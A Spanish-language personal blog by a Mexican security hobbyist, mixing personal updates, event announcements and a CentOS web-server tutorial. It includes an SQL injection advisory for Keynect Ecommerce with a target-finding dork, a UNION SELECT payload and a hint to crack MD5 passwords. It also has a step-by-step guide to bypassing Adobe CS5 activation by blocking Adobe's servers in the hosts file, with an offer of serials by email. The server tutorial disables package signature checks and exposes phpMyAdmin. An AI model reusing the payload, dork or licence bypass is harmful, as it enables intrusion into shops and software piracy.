Escrito por
zeux0r en (sin categoría)
Hace tiempo que no escribía en este blog, de echo ya se me había olvidado si soy sincero jeje, después de 8 meses a quien no, ya he limpiado este sitio ya que tenia mucho mensaje spam entre otras cosas, y pues anunciándoles que estare activo nuevamente cada que pueda para actualizar, mientras les tengo la noticia que estare en el X.25 un congreso de seguridad mexicano sobre hacking ethico donde hablare sobre el robo de identidad mediante crimeware, un adelanto de esto es el análisis de varias botnets publicas y otras privadas, las técnicas que usan para infectar a los usuarios y las nuevas vulnerabilidades que hay para ayudarlos a obtener estos datos, como podemos saber que estamos siendo afectados y también como poder desinfectarnos si tenemos uno de estos parásitos dentro de nuestro equipo, pero para que contarles mas , mejor vayan a su sitio oficial, chequen fechas y aparten sus lugares, otra noticia es que ando nuevamente en un foro, muchos saben que no me gusta andar en foros pero este me llamo la atención, no soy el dueño original pero estare ahí apoyando como administrador, visítenlo encontraran cosas interesantes
Les dejo los links de los sitios
x.25 congreso de seguridad informática
http://www.x25.org.mx/
Foro sobre Inseguridad , programación, etc
http://bl4ckh4x0rs.com/
Escrito por
zeux0r en (sin categoría)
despues de mucho tiempo que no escribo nada , ahora les contare que me fui varios dias de visita con unos amigos y tambien para celebrar mis 26 años 
, estuvo chulada ahi en el estado de colima, fiestas todos los dias, antros, bares, hasta un table dance visite jajajaja, pero pues ya es hora de irnos a trabajar y regresar a la vida aburrida que llevo -.-, eso es todo espero postear algo en estos dias relacionado con la informatica
Escrito por
zeux0r en
My life,
azc Que onda gente , bueno después de mucho tiempo sin escribir en mi blog, ya que la fiesta y el trabajo me consume 
jajaja , les contare lo mas cabron que estuvo en mayo , ahorita ando trabajando con arduino, haciéndolo trabajar como sniffer pero se me complico un poco, cosa que yo no pueda solucionar , despues la escuela, fui a checar si aun existo ahi por que como no he ido jejeje , en fin , tambien estoy en libertad de nuevo , listo para las vacaciones de verano e irme a una playita o no se , y eso es todo lo que paso en mayo, este mes estare posteando cosas interesantes 
saludos
Escrito por
zeux0r en (sin categoría)
Que tal amigos, pues hoy les mostrare como configurar Centos para web server sencillo con , PHP, MYSQL, phpMyAdmin y su servidor FTP. 
Primero empezaremos por logearnos en el servidor por medio de ssh , podemos ocupar en este caso la herramienta putty que la pueden encontrar en gogole fácilmente , ya que ingresaron su usuario root y contraseña realizaremos un update con yum de la siguiente manera. yum update Y nos mostrara algo como esto a lo que daremos “y”.
Ya que ha terminado de updatearse el servidor instalaremos php de la misma forma
yum install php
A lo que igual daremos “y” para permitir la instalación.
Ahora vamos con mysql que es similar.
yum install mysql-server
Damos y para proceder con la instalación y al terminar iniciaremos el servidor mysql de la siguiente manera.
service mysqld start
Y nos tiene que salir
Ahora agregaremos una password a nuestro sql escribiendo lo siguiente
mysqladmin -u root password insecuremx
Ya habiendo escrito esto vamos a ingresar para verificar que funciono.
mysql -u root –p
Y el resultado debe ser.
Bien ya tenemos casi todo listo, solo nos falta un servidor ftp.
Usaremos proftpd en este caso, para instalarlo tenemos que editar un repo escribiendo lo siguiente.
vi /etc/yum.repos.d/CentOS-Base.repo
y agregar estas líneas al final tecleando “i” para que podamos escribir en el archivo
# Name: RPMforge RPM Repository for Red Hat Enterprise 5 - dag # URL: http://rpmforge.net/ [RHEL5-rpmforge] name = Red Hat Enterprise 5 - RPMforge.net - dag #baseurl = http://apt.sw.be/redhat/el5/en/i386/dag mirrorlist = http://apt.sw.be/redhat/el5/en/mirrors-rpmforge #mirrorlist = file:///etc/yum.repos.d/mirrors-rpmforge enabled = 1 protect = 0 #gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-rpmforge-dag gpgcheck = 0 Después de esto presionamos la tecla esc y escribimos “:w” para que se quede grabado y el resultado será.
Esto quiere decir que ha sido guardado, ahora presionamos “ctrl+z” para salir e instalamos el servidor ftp
yum install proftpd
Terminando esto agregaremos un usuario y contraseña, ojo la contraseña se escribe dos veces idéntica.
useradd –d /var/www/html/ insecure
Y asignamos la contraseña al usuario insecure
passwd insecure
este será el resultado
Bueno para que ahora funcione todo bien vamos a reiniciarlo.
service httpd restart
service mysqld restart
service proftpd start
Como paso final instalamos phpMyAdmin con
yum install phpmyadmin
Y creamos un acceso directo en el home
ln -s /usr/share/phpmyadmin/ /var/www/html/sqlserver
Listo tenemos nuestro servidor web funcionando
Nos logeamos al servidor ftp 
Subimos un archivo php con un mensaje y esta listo
Espero les agrade un saludo y gracias por leer este tutorial de como armanr un servidor web con centos
Pues me aparezco aquí de cínico en mi blog , casi lo dejo un mes solo al pobre, con esto del proyecto de insecure, estar editando videos , aprender a usar nuevos editores (ya que soy muy chafa ) sacando bugs nuevos , la escuela , el trabajo que me esta matando vengo a escribir a mi casita , ahora les vengo anunciando , si señora , si señorita , pásele pásele marchanta xD.
Que insecure.org.mx tiene un concurso para ganarse un ipod shuffle, es super fácil , solo tienen que escribir un articulo sobre informática y enviarlo a post@insecure.org.mx y listo , a final de mes escogeremos los mejores y se enviara el ipod al ganador.
Asi que muchachones envíen sus post y suerte
Aquí les dejo el link con las bases del concurso, solo aplica a México.
http://insecure.org.mx/%C2%A1primer-concurso-insecure-org-mx.html
Escrito por
zeux0r en
My life,
azc Bueno ya tenia rato que estaba abandonado mi blog , pero como me fui un ratillo de vacaciones con mi compa el panzon pues ya no escribia , después con el sitio de insecure que salio días tarde y bla bla bla , pues menos , la buena noticia es que de nuevo estoy en mi casa (solo por dos días mas) y preparándome para semana santa estar al 100 , también por que el dia de hoy se estreno el primer video de insecure mexico esta mas o menos , aun no se mucho sobre edición de videos pero ya le estoy moviendo un poco mas , ahora también puse un texto sobre botnets que no quiero ponerlo aquí por que si no se vera muy mal tanto repetir el texto , y pues ya checando después de semana santa irme a la ciudad de Tuxtla guitierrez con bucio para ver si hacemos el podcast juntos y lo saquemos los primeros días de mayo, sin mas por el momento un saludo banda que me sigue
ps: si toman estas vacaciones no manejen, recuerden que el unico que choca y sale vivo soy yo ustedes si se mueren
Escrito por
zeux0r en (sin categoría)
Bueno tenia rato que no escribía algo es por que no había tenido tiempo entre fiestas, escuela y negocios , esta ves el post tendrá dos motivos , el primero anunciar el inicio de In Secure México, si se dan cuenta he cambiado mi blog del index a un subdominio , es por que el home lo usaremos para un nuevo proyecto que tenemos en mente sobre informática en general, se realizo un video de presentación de InSecure pero no quedo muy bien que digamos aun me falta mover al editor y pues mejor se los platico un poco con unas preguntas que realice:
que es InSecure México?
Pues InSecure México es un pequeño proyecto que tenemos sobre todos los temas de actualidad, tendremos desde videos interactuando los que estamos dentro del proyecto , asi como podcast, noticias y demás , osea en un resumen sera un portal sobre investigación de la nueva y antigua tecnología.
Cada cuanto saldrán temas en el sitio ?
Esperamos que las noticias sean actualizadas día con día, los videos y podcast serán mes con mes , pero estarán alternados con un espacio de 15 dias cada uno , y los manuales o investigaciones serán una ves a la semana o mas , dependiendo como estemos en tiempos los administradores
Cuando arranca InSecure México?
InSecure México estará empezando el día 1 de abril con noticias y el primer podcast o video se lanzara el día 15 de abril
Quienes Conforman InSecure México?
Por el momento solo somos 2 personas ya de lleno integradas a este proyecto que es Rafael Bucio y un servidor Arturo Zamora, ya se nos estarán integrando Manuel, Alejandro y no sabemos si xzite estará también en el grupo de trabajo
Como ven esto es mas o menos lo que sera InSecure México , espero tener el apoyo de muchos de ustedes ya que es un proyecto totalmente desinteresado y echo para ustedes.
El otro tema que esta preparado para este post es nuevamente la seguridad en los sitios mexicanos, es mucho muy penoso que algunos de los sitios mas importantes tengan errores tan graves , están dentro del top de los 20 sitios mas importantes en el gobierno mexicano , y estos errores no solo afectan la información de los usuarios , si no también el sistema permitiéndonos subir archivos , movernos con libertad por el servidor , modificar información y obviamente verla entre otras cosas, los fallos consisten en los siguientes, remote file upload , este tipo de ataques nos permite subir archivos a el servidor deseado, sql inyección , aquí podemos ver usuarios y contraseñas , también modificar y usar la técnica pasada, file download, podemos descargar archivos con una Extension especifica y ver su contenido , muchos piensan que no es muy peligroso pero puede afectar mucho a los usuarios.
Daremos un reporte detallado en un post en InSecure solamente que tengamos los archivos para cada sitios y estén totalmente reparados los errores donde afecto y que se uso para realizar este tipo de analizáis en el sitio
un saludo gente
Así es.
Diosdelared.com va a realizar su primera ronda de conferencias online totalmente gratis , ósea que no tendrán que viajar para ver a sus ponentes favoritos , así como para dar una charla, porque pueden enviar sus propuestas de platica para también dar una ustedes y compartir un poco de sus conocimientos las bases son las siguientes :
Dónde enviar las Charlas Las propuestas para las charlas deben ser enviadas por mensaje privado en diosdelared.com al usuario “MurdeR”.
Las charlas van a ser recibidas mensualmente y las mejores serán seleccionadas para disertar en vivo para todo el público de latinoamerica.
Cómo enviar las Charlas
El envío de la propuesta de charla debe tener los siguientes datos:
- [b]Título:[/b]
- [b]Autor(es):[/b] Nombre y apellido o nickname, títulos academicos, experiencia profesional, etc.
- [b]Tipo :[/b] Puede ser Charla tradicional o Taller (Con PC)
- [b]Tiempo estimado de duración:[/b] Las charlas generalmente son de 45' y los talleres tiene una duración de 1:45. En caso de que sea mayor o menor el tiempo requerido solicitamos su justificación.
- [b]Breve descripción de la charla:[/b] Uno o dos párrafo(s) que explique -no tan brevemente- el contenido de la presentación.
- [b]Nivel objetivo de la charla:[/b] Clasificar dentro de: newbie (nuevo)/intermedio/avanzado/experto)
- [b]Tipo de publico:[/b] Público en general, aficionados, expertos, profesionales.
- [b]Conocimientos previos:[/b] Especificar que conocimientos previos
deberán tener los asistentes.
- [b]Temática:[/b] programación, multimedia, comunicaciones, estación
de trabajo, servicios de red, interoperabilidad, educación, kernel, etc.
- [b]Email[/b] del/los autor/es: Para poder comunicarnos.
- [b]Residencia[/b] del/los autor/es.
[1] Qué formato deben tener las Presentaciones:
El envío de las diapositivas y/o presentaciones debe tener alguno de los
siguientes formatos:
- Openoffice.org presentation
- HTML standard
- Postscript
- PDF
- Texto plano
Licencia
Debe especificarse una licencia que permita que DDLR distribuya el
material en un CD-Live o de Documentación y que permita ser descargado
de la web.
e
Si no sabe cual especificar puede seleccionar entre GFDL o cc-by-sa 2.5 es.
Así es que espero manden varias solicitudes, por que como fundador de diosdelared me late mucho esta idea , lamentablemente yo no podre dar ni una plática porque no tengo tiempo un saludo y bye bye
Despues de mucho , mucho tiempo, vuelvo a publicar una vulnerabilidad , me parece que esta es la numero 16 o 17 que he reportado , ya me habia quedado muchos bugs para mi solo pero esta ves lo compartire , el bug ya fue reportado
gracias un saludo
======================================================================================== | # Title : SQL Injection Keynect Ecommerce |
| # Author : Arturo Zamora |
| # email : Arturo_zamora_c@hotmail.com |
| # DAte : 10/03/2011 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : Powered by Keynect Ecommerce SHop http://www.keynect.co.uk/ |
| # Dork : inurl:products.php?ctf= |
| # Tested on: Windows Xp |
====================== zeux0r 2011 =================================
Exploit :
======================
http://localhost.com//products.php?ctf={sqli}
======================
example:
======================
http://localhost.com/products.php?ctf=-1+union+select+0,1,….43+from+information_schema.tables--
======================
Information :
======================
password decrypt md5
======================
I Love U Pumosita
================================ Mexican shotos ========================================
Greetz : all my friend * zer0-zo0rg * Bucio * Klanx * Xoxonaizer * GothicX * Duuf * Murder etc
-------------------------------------------------------------------------------------------
Mirror
http://www.exploit-db.com/exploits/16954/
Bueno vamos a activar la suite Adobe Design Premium CS5 en Windows, primero vamos a ir a adobe.com y nos firmaremos con un usuario en el sitio y procedemos a descargar la versión trial de Adobe Design Premium, pesa un poco pero ya teniéndolo abajo vamos a instalarlo , esto puede tardar un poco
Aquí le daremos en continuar y en la zona de serial seleccionaremos instalar el producto como prueba
Ya que ha terminado la instalación vamos a irnos a la siguente ruta
C:\WINDOWS\system32\drivers\etc
(si estas en vista o seven su equivalente a esta carpeta) vamos a abrir el archivo host e introducimos las siguientes direcciones
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
Ahora vamos a abrirlo y nos pedirá un serial señalaremos la casilla para activarlo y meteremos el siguiente serial
-1038-6469--0756-**** (no puedo colocar seriales en el host por las reglas pero me las pueden pedir dejándome sus datos en el formulario de contacto y les enviare el serial via mail)
Y nos saldrá algo como esto
Así entonces podremos usar nuestra suite a la perfección sin tener que comprarla
bye
{ 
